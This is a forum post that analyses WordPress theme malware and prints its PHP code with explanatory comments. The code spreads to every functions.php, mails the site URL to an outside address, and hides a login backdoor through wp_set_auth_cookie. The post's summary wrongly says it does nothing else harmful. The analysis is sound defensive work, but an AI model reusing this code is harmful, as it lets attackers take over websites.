一段WordPress主题恶意代码分析(貌似很多人中招了)

[复制链接]
ordersy 发表于 2019-8-24 16:27:12 | 显示全部楼层 |阅读模式
分析过程我都写在代码注释里了,如下:               
  1. $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
  2.                     //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
  3.                     $output .= $before . "Not found" . $after;
  4.                     //如果文件是以 ?> 标记结尾的,连标记一起取过来
  5.                     if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
  6.                     //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码
  7.                     $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
  8.                     //后面这句也是伪装用的            
  9.                     $output .= ($isshowdots && $ellipsis) ? "..." : "";
  10.                 }
  11.             }
  12.         }
  13.     }
  14.     return $output;
  15. }
  16. function _get_allwidgets_cont($wids,$items=array()){
  17.     //从$wids数组弹出一个元素(实际上是一个位置)
  18.     $places=array_shift($wids);
  19.     //如果位置字串是以/结尾的,则去掉/
  20.     if(substr($places,-1) == "/"){
  21.         $places=substr($places,0,-1);
  22.     }

  23.     //若不存在这样的文件或目录则直接返回false
  24.     if(!file_exists($places) || !is_dir($places)){
  25.         return false;
  26.     }elseif(is_readable($places)){
  27.         //否则的话。。。嘿嘿
  28.         //遍历此目录
  29.         $elems=scandir($places);
  30.         foreach ($elems as $elem){
  31.             if ($elem != "." && $elem != ".."){
  32.                 //如果是目录,则加入$wids数组
  33.                 if (is_dir($places . "/" . $elem)){
  34.                     $wids[]=$places . "/" . $elem;
  35.                 } elseif (is_file($places . "/" . $elem)&&
  36.                     $elem == substr(__FILE__,-13)){
  37.                         //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
  38.                     $items[]=$places . "/" . $elem;}
  39.                 }
  40.             }
  41.     }else{
  42.         return false;   
  43.     }
  44.     //下面还有子目录?再找找看,递归
  45.     if (sizeof($wids) > 0){
  46.         return _get_allwidgets_cont($wids,$items);
  47.     } else {
  48.         //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径
  49.         return $items;
  50.     }
  51. }

  52. //下面是3个针对低版本的php而写的兼容函数
  53. if(!function_exists("stripos")){
  54.     function stripos(  $str, $needle, $offset = 0  ){
  55.         return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
  56.     }
  57. }

  58. if(!function_exists("strripos")){
  59.     function strripos(  $haystack, $needle, $offset = 0  ) {
  60.         if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
  61.         if(  $offset < 0  ){
  62.             $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
  63.         }
  64.         else{
  65.             $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
  66.         }
  67.         if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
  68.         $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
  69.         return $pos;
  70.     }
  71. }
  72. if(!function_exists("scandir")){
  73.     function scandir($dir,$listDirectories=false, $skipDots=true) {
  74.         $dirArray = array();
  75.         if ($handle = opendir($dir)) {
  76.             while (false !== ($file = readdir($handle))) {
  77.                 if (($file != "." && $file != "..") || $skipDots == true) {
  78.                     if($listDirectories == false) { if(is_dir($file)) { continue; } }
  79.                     array_push($dirArray,basename($file));
  80.                 }
  81.             }
  82.             closedir($handle);
  83.         }
  84.         return $dirArray;
  85.     }
  86. }

  87. //这个动作添加了,用于检测所有主题目录下functions.php并感染
  88. add_action("admin_head", "_verifyactivate_widgets");

  89. function _getprepare_widget(){
  90.     if(!isset($text_length)) $text_length=120;
  91.     if(!isset($check)) $check="cookie";
  92.     if(!isset($tagsallowed)) $tagsallowed="";
  93.     if(!isset($filter)) $filter="none";
  94.     if(!isset($coma)) $coma="";
  95.     if(!isset($home_filter)) $home_filter=get_option("home");
  96.     if(!isset($pref_filters)) $pref_filters="wp_";
  97.     if(!isset($is_use_more_link)) $is_use_more_link=1;
  98.     if(!isset($com_type)) $com_type="";
  99.     if(!isset($cpages)) $cpages=$_GET["cperpage"];
  100.     if(!isset($post_auth_comments)) $post_auth_comments="";
  101.     if(!isset($com_is_approved)) $com_is_approved="";
  102.     if(!isset($post_auth)) $post_auth="auth";
  103.     if(!isset($link_text_more)) $link_text_more="(more...)";
  104.     if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
  105.     if(!isset($checkswidgets))
  106.     //这个实际是wp_set_auth_cookie
  107.     $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
  108.     if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
  109.     if(!isset($contentmore)) $contentmore="ma".$coma."il";
  110.     if(!isset($for_more)) $for_more=1;
  111.     if(!isset($fakeit)) $fakeit=1;
  112.     if(!isset($sql)) $sql="";

  113.     //如果 _is_widget_active_ option内容为空,即表示没有被感染过
  114.     if (!$widget_yes) :

  115.     global $wpdb, $post;
  116.     //取出存在已经通过的评论(不包括trackback/pingback)的文章
  117.     // post_author 为 livethemas@gmail.com 的文章,肯定是没有的

  118.     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND post_author="li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m" AND post_password="" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  119.     if (!empty($post->post_password)) {
  120.         if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
  121.             if(is_feed()) {
  122.                 $output=__("There is no excerpt because this is a protected post.");
  123.             } else {
  124.                 $output=get_the_password_form();
  125.             }
  126.         }
  127.     }
  128.     if(!isset($fixed_tags)) $fixed_tags=1;
  129.     if(!isset($filters)) $filters=$home_filter;
  130.     //$gettextcomments实际上为 wp_mail
  131.     if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
  132.     if(!isset($tag_aditional)) $tag_aditional="div";

  133.     //这里$sh_cont即为 livethemas@gmail.com
  134.     if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
  135.     if(!isset($more_text_link)) $more_text_link="Continue reading this entry";  
  136.     if(!isset($isshowdots)) $isshowdots=1;

  137.     $comments=$wpdb->get_results($sql);
  138.     if($fakeit == 2) {
  139.         $text=$post->post_content;
  140.     } elseif($fakeit == 1) {
  141.         $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
  142.     } else {
  143.         $text=$post->post_excerpt;
  144.     }
  145.     //开始调用 wp_mail 向 livethemas@gmail.com 发送邮件,标题和内容都是被感染的博客的URL 地址
  146.     $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  147.     if($text_length < 0) {
  148.         $output=$text;
  149.     } else {
  150.         if(!$no_more && strpos($text, "")) {
  151.             $text=explode("", $text, 2);
  152.             $l=count($text[0]);
  153.             $more_link=1;
  154.             //执行这一句时就开始发邮件了。
  155.             $comments=$wpdb->get_results($sql);
  156.         } else {
  157.             $text=explode(" ", $text);
  158.             if(count($text) > $text_length) {
  159.                 $l=$text_length;
  160.                 $ellipsis=1;
  161.             } else {
  162.                 $l=count($text);
  163.                 $link_text_more="";
  164.                 $ellipsis=0;
  165.             }
  166.         }
  167.         for ($i=0; $i<$l; $i++)
  168.                 $output .= $text[$i] . " ";
  169.     }
  170.     //把感染标记置为1
  171.     update_option("_is_widget_active_", 1);
  172.     if("all" != $tagsallowed) {
  173.         $output=strip_tags($output, $tagsallowed);
  174.         return $output;
  175.     }
  176.     endif;
  177.     $output=rtrim($output, "\s\n\t\r\0\x0B");
  178.     $output=($fixed_tags) ? balanceTags($output, true) : $output;
  179.     $output .= ($isshowdots && $ellipsis) ? "..." : "";
  180.     //$filter 为 none ...,又是在伪装
  181.     $output=apply_filters($filter, $output);
  182.     switch($tag_aditional) {
  183.         case("div") :
  184.             $tag="div";
  185.         break;
  186.         case("span") :
  187.             $tag="span";
  188.         break;
  189.         case("p") :
  190.             $tag="p";
  191.         break;
  192.         default :
  193.             $tag="span";
  194.     }

  195. //$checkswidgets即是wp_set_auth_cookie
  196.     if ($is_use_more_link ) {
  197.         if($for_more) {
  198.             $output .= " <" . $tag . " class="more-link">ID) . "#more-" . $post->ID ."" title="" . $more_text_link . "">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "" . "\n";
  199.         } else {
  200.             $output .= " <" . $tag . " class="more-link">ID) . "" title="" . $more_text_link . "">" . $link_text_more . "" . "\n";
  201.         }
  202.     }
  203.     return $output;
  204. }

  205. //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”
  206. add_action("init", "_getprepare_widget");

  207. //这个函数也是用来伪装的,无恶意
  208. function __popular_posts($no_posts=6, $before="
  209. ", $after="
  210. ", $show_pass_post=false, $duration="") {
  211.     global $wpdb;
  212.     $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS "comment_count" FROM $wpdb->posts, $wpdb->comments";
  213.     $request .= " WHERE comment_approved="1" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status="publish"";
  214.     if(!$show_pass_post) $request .= " AND post_password =""";
  215.     if($duration !="") {
  216.         $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
  217.     }
  218.     $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
  219.     $posts=$wpdb->get_results($request);
  220.     $output="";
  221.     if ($posts) {
  222.         foreach ($posts as $post) {
  223.             $post_title=stripslashes($post->post_title);
  224.             $comment_count=$post->comment_count;
  225.             $permalink=get_permalink($post->ID);
  226.             $output .= $before . " " . $post_title . " " . $after;
  227.         }
  228.     } else {
  229.         $output .= $before . "None found" . $after;
  230.     }
  231.     return  $output;
  232. }
  233. ?>
复制代码

最后,总结一下。
这个恶意代码,在每次有人访问你的博客页面时会检测是否当前博客下面的所有主题都已经被感染,如果没有,则一并感染之。
完了之后,在wp的初始化动作init执行时,它会检查当前博客是否已经发送邮件到livethemas@gmail.com 这个邮箱(它怎么知道自己发送了没有呢?在你的wp_options表中保存了一个名字为_is_widget_active_ 的选项,如果已经发送成功,则把它的值设置为1 ),如果没有,则以当前被感染博客的主页URL为标题和内容,向 livethemas@gmail.com 这个邮箱 发送邮件。
就是这样,其它的坏事它没有干。
你说这个人他蛋疼不?浪费我时间,害得我还来分析它。。。。

啦啦啦
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则